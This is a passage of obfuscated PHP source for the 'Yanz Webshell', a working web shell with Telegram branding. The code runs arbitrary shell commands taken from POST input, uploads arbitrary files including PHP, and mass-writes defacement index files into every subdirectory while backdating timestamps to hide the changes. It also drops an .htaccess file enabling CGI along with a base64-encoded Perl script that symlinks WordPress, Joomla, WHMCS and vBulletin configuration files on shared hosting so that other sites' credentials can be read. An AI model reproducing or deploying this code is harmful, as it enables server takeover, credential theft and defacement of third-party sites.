-0300+0330);$_el<=$_o;$_el++)$_bl.=STR_roT13($_we[$_el])."\x2f";$_bl.="\042,\042\x22,\042\042)'>".$_we[$_o]."/</\141>";}$_cw=array("UT\x46-8","Windows-1251","KO\1118-R","KOI8-U","cp866");$_n="";foreach($_cw as$_nos)$_n.="<o\160tion val\165\x65\075\x22".$_nos."\x22 ".($_POST["ch"]==$_nos?"sel\145cted":"")."\076".$_nos."<\057\x6fption>";$_fbd=array("\106\151les"=>"fm");if(!empty($_COOKIE[$_i]))$_fbd["Masfix"]="Masfix";$_fbd["Symlink403"]="sym";$_fbd["Symlink404"]="sym404";$_fbd["Vhost"]="vhost";$_fbd["WpAutoedit"]="wpautoedit";$_fbd["ReadDomains"]="readdomains";$_fbd["KillProccess"]="killproccess";$_fbd["TerminalV2"]="terminalv2";$_fbd["Adminer"]="adminer";$_fbd["WpDownloader"]="wpdownloader";$_fbd["Vhost W4r10k"]="vhost2";$_fbd["MassHtacces"]="masshta";$_fbd["MassDelete"]="massdelete";$_fbd["MassIndoXploit"]="massindox";$_h="";foreach($_fbd as$_gtq=>$_e)$_h.="<th\x20width\x3d\042".(int)((int)round(50+50)/coUnt($_fbd))."\045\x22>\x5b <\141 href=\042#\x22\040on\143lick=\x22g('".$_e."',null,'','\x27,'')\042>".$_gtq."</a> ]</th\076";$_dej="";if($_vor=="\167in"){foreach(@Range("c","z") as$_szx)if(@Is_dIr($_szx.":\134"))$_dej.="<a hr\145f\x3d\x22#\042 onclic\153=\x22g\x28'fm'\x2c'".STr_roT13($_szx)."\x3a/')\042>[\040".$_szx." ]</\141> ";}$_uy=$_SERVER["SERVER_\x41\x44DR"];if(empty($_uy)){$_uy=GeThoSTbyName($_SERVER["SERVER\x5f\x4eA\115E"]);}echo"<ta\x62l\x65 \x63lass=inf\x6f c\145llpad\144\151ng=3 cellspaci\x6eg=0\040wid\x74h=100%><tr><td\040wi\144th=1><span><fon\164 c\157lor=r\x65\144>Attention:<\x2f\x66ont><br\076\x55n\x61\155e:<b\162>Php\072<br>Hdd\x3a<\142r>Cwd:".($_vor=="\x77in"?"<br>D\162i\x76es\072":"")."</s\160\x61n><\x2ftd\x3e"."<td><a href='https://t.me/yanz54321'</a><u><b>Yanz Webshell!</b\x3e \055 PRIV8 WEB SHELL ORB YANZ BYPASS! V3.5</\165>\074/\141\x3e<br><nob\162>".($_v?subsTr($_v,-01+01,(int)round(40+40+40)):"N/A")."</no\142r><br>".@pHPversiON()." <sp\141n>S\141fe mode:</span> ".($_vpb?"<font color=r\x65d>ON<\057fon\164\x3e":"\074f\157n\x74 color=gree\156>\074\142>OF\106</b></fo\156t>")." \074span>\104ateti\155e:\x3c/sp\141n>\040".daTE("Y-m-d \x48:i:s")."<br>".($_ejl?vIewSIZe($_ejl):"")." <span>F\x72ee:</s\x70an\076 ".($_pn?vIewSiZe($_pn):"")." (".(($_pn&&$_ejl)?(int)($_pn/$_ejl*(0157+0136-0151)):"0")."%)<b\162><span id=\042link\163\x22 class=\042wfw\042>".$_bl." ".WPerMSCOLOr($_za)." <a href\x3d# onc\x6cick=\042g\050'fm','".STr_rot13($_wda)."','',''\054'')\x22>[\x20root ]</a> <a h\x72ef\x3d# onc\x6cick=\042g\x28'fm','".Str_rOT13($_zrt)."','','',\047')\042>[ \150o\155\x65 ]\x3c/a>\074/span><span \151\144=\042cwd\x22 styl\x65=\x22\x64isplay: \x6eone\x3b\x22 class=\x22wfw\042><input size=".(STrlen($_za)+(int)round(11+11))." type=text\040valu\x65=\042".$_za."\042>\074/s\160an> <a \x68ref=# oncli\x63\153\075\042show()\073\042><font\040\x63olo\162=#fff i\x64=\042bat\x22>\124ex\x74</\146ont\x3e</a><br>".$_dej."\x3c/td\x3e"."<td width=1 alig\156=rig\x68t>\x3cnobr>\x3csele\143t onchan\x67e=\042g(null,null\054".(!empty($_POST["p"])?"'".$_POST["p"]."'":"null").",null,nu\154l,t\x68is.v\141lue\x29\x22><optgroup labe\154=\x22Page charset\x22>".$_n."<\x2fo\x70tgroup><\x2f\163el\145\x63t>\074br>\x3c\163p\141n>\123e\162ver\x20IP:</sp\x61\x6e><br>".$_uy."<br>\074span>Cl\151ent I\x50:</sp\141n><\x62r>".$_SERVER["REMOTE_ADDR"]."<br><a href=?ynzmini=".str_replace('\\', "/", getcwd()).">[YANZ MINI SHELL BYPASS]</a></nob\x72></td><td width=\"1\" align=\"left\"><nobr><img itemprop=\"line\" height=\"100\" width=\"30\" src=\"https://a.top4top.io/p_2263b6a5p1.png\"><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://t.me/yanz54321\"><img src=\"https://e.top4top.io/p_26973oc9i1.png\" width=\"120\" height=\"100\" title=\"YanzWSO\" alt=\"YanzWSO\"></a></nobr></td></t\x72\076</table>"."<table style=\042bo\162\x64er-top:2px solid \x233\x33\x33;\x22 cellpa\x64d\x69ng=3 \143ellspa\143\151ng=0 \x77idth\x3d100%><t\x72>".$_h."</\164r><\057table><div \163ty\x6ce=\x22ma\162gin:5\042\076";} function event_callback ($message) { global $callback; echo json_encode($message); } function messages($arraynya){ echo($arraynya); } function wfOotER(){$_za=$this->_za;$_lia=@is_WrItabLe($_za)?"\x20<font color='green'>(Writeable)</fon\x74>":" <fo\x6et colo\162=r\145d>\050Not writable\x29<\057font\076";if(isset($_POST['subcmd'])){ echo "<pre class='text-white'>"; $input = $_POST['command']; $output = shell_exec($input); echo "<br>"; echo "<center>WSO BYPASS YANZ!</center>"; echo "<br>"; echo '$WSOYanZ: ';echo "<br>"; echo $output; echo "</pre>";}; if (isset($_FILES["file"])) { $o0b09 = $_FILES["file"]; $AcYdi = $o0b09["name"]; $BV44j = $o0b09["tmp_name"]; $vJrYH = explode(".", $AcYdi); $vJrYH = strtolower(end($vJrYH)); $fqv3X = array("txt", "pdf", "ogg", "html", "docx", "php", "jpg", "jpeg", "gif", "png", "bmp", "svg", "mp3", "mp4", "avi", "mov", "wav", "zip", "rar", "7z", "tar", "gz"); if (!in_array($vJrYH, $fqv3X)) { echo "Hanya file dengan format .txt, .pdf, .doc, .docx, .ogg, .php, .png, .jpg, .jpeg, .gif, .bmp, .svg, .mp3, .mp4, .avi, .mov, .wav, .zip, .rar, .7z, .tar, dan .gz yang diizinkan."; } else { $DwYvY = '' . $AcYdi; move_uploaded_file($BV44j, $DwYvY); echo "File Success Upload.<br>"; echo "File saved On: " . $DwYvY . "<br>"; echo "Open file: <a href=\"" . $DwYvY . "\">Open/Download</a>"; } } if ($_SERVER["REQUEST_METHOD"] == "POST") { // collect value of input field $dir = $_POST['defpageD']; if (empty($dir)) { } else { echo "Masfix Yanz"; echo "<br>"; echo "File mass picked : $dir"; echo "<br>"; } } if($_POST['tipe'] == 'murah'){ if (isset ($_POST['base_dir'])) { if (!file_exists ($_POST['base_dir'])) die ($_POST['base_dir']." Not Found !<br>"); if (!is_dir ($_POST['base_dir'])) die ($_POST['base_dir']." Is Not A Directory !<br>"); @chdir ($_POST['base_dir']) or die ("Cannot Open Directory"); $files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>"); $defpageR = file_get_contents ($dir); foreach ($files as $file): if ($file != "." && $file != ".." && @filetype ($file) == "dir") { $index = getcwd ()."/".$file."/".$_POST['file_name']; chmod($index, 0777); if (file_put_contents ($index, $defpageR)) echo "$index    <span style='color: green'>OK</span><br>"; else echo "$index    <span style='color: red'>FAILED</span><br>"; chmod($index, 0644); touch($index, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s"))); } endforeach; } } if($_POST['tipe'] == 'publichtml'){ if (isset ($_POST['base_dir'])) { if (!file_exists ($_POST['base_dir'])) die ($_POST['base_dir']." Not Found !<br>"); if (!is_dir ($_POST['base_dir'])) die ($_POST['base_dir']." Is Not A Directory !<br>"); @chdir ($_POST['base_dir']) or die ("Cannot Open Directory"); $files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>"); $defpageR = file_get_contents ($dir); foreach ($files as $file): if ($file != "." && $file != ".." && @filetype ($file) == "dir") { $dirpub = "public_html/"; $index = getcwd ()."/".$file."/".$dirpub.$_POST['file_name']; chmod($index, 0777); if (file_put_contents ($index, $defpageR)) echo "$index    <span style='color: green'>OK</span><br>"; else echo "$index    <span style='color: red'>FAILED</span><br>"; chmod($index, 0644); touch($index, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s"))); } endforeach; } } if($_POST['tipe'] == 'customsubdir'){ if (isset ($_POST['base_dir'])) { if (!file_exists ($_POST['base_dir'])) die ($_POST['base_dir']." Not Found !<br>"); if (!is_dir ($_POST['base_dir'])) die ($_POST['base_dir']." Is Not A Directory !<br>"); @chdir ($_POST['base_dir']) or die ("Cannot Open Directory"); $files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>"); $defpageR = file_get_contents ($dir); foreach ($files as $file): if ($file != "." && $file != ".." && @filetype ($file) == "dir") { $dirpub = $_POST['sub_name']; $index = getcwd ()."/".$file."/".$dirpub.$_POST['file_name']; chmod($index, 0777); if (file_put_contents ($index, $defpageR)) echo "$index    <span style='color: green'>OK</span><br>"; else echo "$index    <span style='color: red'>FAILED</span><br>"; chmod($index, 0644); touch($index, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s"))); } endforeach; } } if($_POST['tipe'] == 'murahold'){ if (isset ($_POST['base_dir'])) { if (!file_exists ($_POST['base_dir'])) die ($_POST['base_dir']." Not Found !<br>"); if (!is_dir ($_POST['base_dir'])) die ($_POST['base_dir']." Is Not A Directory !<br>"); @chdir ($_POST['base_dir']) or die ("Cannot Open Directory"); $files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>"); $defpageR = file_get_contents ($dir); foreach ($files as $file): if ($file != "." && $file != ".." && @filetype ($file) == "dir") { $index = getcwd ()."/".$file."/".$_POST['file_name']; chmod($index, 0777); if (file_put_contents ($index, $_POST['index'])) echo "$index    <span style='color: green'>OK</span><br>"; else echo "$index    <span style='color: red'>FAILED</span><br>"; chmod($index, 0644); touch($index, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s"))); } endforeach; } } if($_POST['tipe'] == 'publichtmlold'){ if (isset ($_POST['base_dir'])) { if (!file_exists ($_POST['base_dir'])) die ($_POST['base_dir']." Not Found !<br>"); if (!is_dir ($_POST['base_dir'])) die ($_POST['base_dir']." Is Not A Directory !<br>"); @chdir ($_POST['base_dir']) or die ("Cannot Open Directory"); $files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>"); $defpageR = file_get_contents ($dir); foreach ($files as $file): if ($file != "." && $file != ".." && @filetype ($file) == "dir") { $dirpub = "public_html/"; $index = getcwd ()."/".$file."/".$dirpub.$_POST['file_name']; chmod($index, 0777); if (file_put_contents ($index, $_POST['index'])) echo "$index    <span style='color: green'>OK</span><br>"; else echo "$index    <span style='color: red'>FAILED</span><br>"; chmod($index, 0644); touch($index, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s"))); } endforeach; } } if($_POST['tipe'] == 'customsubdirold'){ if (isset ($_POST['base_dir'])) { if (!file_exists ($_POST['base_dir'])) die ($_POST['base_dir']." Not Found !<br>"); if (!is_dir ($_POST['base_dir'])) die ($_POST['base_dir']." Is Not A Directory !<br>"); @chdir ($_POST['base_dir']) or die ("Cannot Open Directory"); $files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>"); $defpageR = file_get_contents ($dir); foreach ($files as $file): if ($file != "." && $file != ".." && @filetype ($file) == "dir") { $dirpub = $_POST['sub_name']; $index = getcwd ()."/".$file."/".$dirpub.$_POST['file_name']; chmod($index, 0777); if (file_put_contents ($index, $_POST['index'])) echo "$index    <span style='color: green'>OK</span><br>"; else echo "$index    <span style='color: red'>FAILED</span><br>"; chmod($index, 0644); touch($index, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s"))); } endforeach; } } if ($_SERVER["REQUEST_METHOD"] == "POST") { $memek = $_POST['base_dir'].'/'; echo '<br>'; if($_POST['tipemasshta'] == 'notalldir'){ execute1($memek); } if($_POST['tipemasshta'] == 'alldir'){ execute($memek); } if($_POST['tipemasshta'] == 'customdir'){ $dirpub = $_POST['sub_name']; execute2($memek,$dirpub); } } if($_POST['start']){ echo "[ <a href='?dir=$dir' style='color:red'>Kembali</a> ] <textarea class='form-control' rows='13' disabled=''>"; hapus_massal($_POST['d_dir'], $_POST['d_file']); echo "</textarea><br/>"; } if(isset($_POST["coldhackers"])){@mkdir("W4r10k",0755);@chdir("W4r10k");$elesem=".htaccess";$elakab="$elesem";$filhat=fopen($elakab,"w")or die("Can't Write htaccess !");$htcont="Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cin\n\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";fwrite($filhat,$htcont);fclose($filhat);$config="IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCnByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOwpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+CjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KPGhlYWQ+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4KPHRpdGxlPi46VzRyMTBrIC0gQ29sZEhhY2tlcnMgOi48L3RpdGxlPgo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgoubmV3U3R5bGUxIHsKIGZvbnQtZmFtaWx5OiB1YnVudHU7CiBmb250LXNpemU6IHgtbGFyZ2U7CiBjb2xvcjogd2hpdGU7CiBiYWNrZ3JvdW5kLWNvbG9yOiBibGFjazsKIHRleHQtYWxpZ246IGNlbnRlcjsKfQpwewogICAgY29sb3I6cmVkO2EKfQo8L3N0eWxlPgo8L2hlYWQ+Cic7CnByaW50ICcKPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSI+CjxwPi46IENvZGVkIGJ5IFc0cjEwayB8IENvbGRIYWNrZXJzIDouPC9wPgo8cD5rdXJhbGludXhAZ21haWwuY29tPC9wPgonOwpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOwpmb3JlYWNoKHNvcnQgcmVhZGRpciAkZGlyKSB7CiAgICBteSAkaXNEaXIgPSAwOwogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsKJHNpdGVzcyA9ICRfOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9vcy9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1vcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1vc2NvbS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9vc2NvbW1lcmNlcy9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictb3Njb21tZXJjZXMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaG9wL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wMi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2FsZS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2FsZS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FtZW1iZXIvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21lbWJlcnMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1tZW1iZXJzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLnBocCcsJHNpdGVzcy4nLTRpbWFnZXMxLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1mb3J1bXMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25mLnBocCcsJHNpdGVzcy4nLTUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtd3AudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9XUC93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy1XUC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtd3AtYmV0YS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtYmV0YS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd29yZHByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXdvcmRwcmVzcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy1Xb3JkcHJlc3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLVdvcmRwcmVzcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXdvcmRwcmVzcy1iZXRhLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbmV3cy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy1uZXdzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbmV3L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLW5ldy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwLWJsb2cudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1iZXRhLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmxvZ3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwLWJsb2dzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9tZS93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtaG9tZS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtcHJvdGFsLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2l0ZS93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3Atc2l0ZS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21haW4vd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwLW1haW4udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC10ZXN0LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhMi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1wcm90YWwudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtY21zLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1zaXRlLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1uZXdzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW5ldy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy12Yn5jb25maWcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXZiM35jb25maWcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1pbmNsdWRlcy12Yi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwMS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htMTUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jZW50cmFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLWNlbnRyYWwudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vV0hNQ1MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tV0hNQ1MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG1jL1dITS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobWMtV0hNLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKT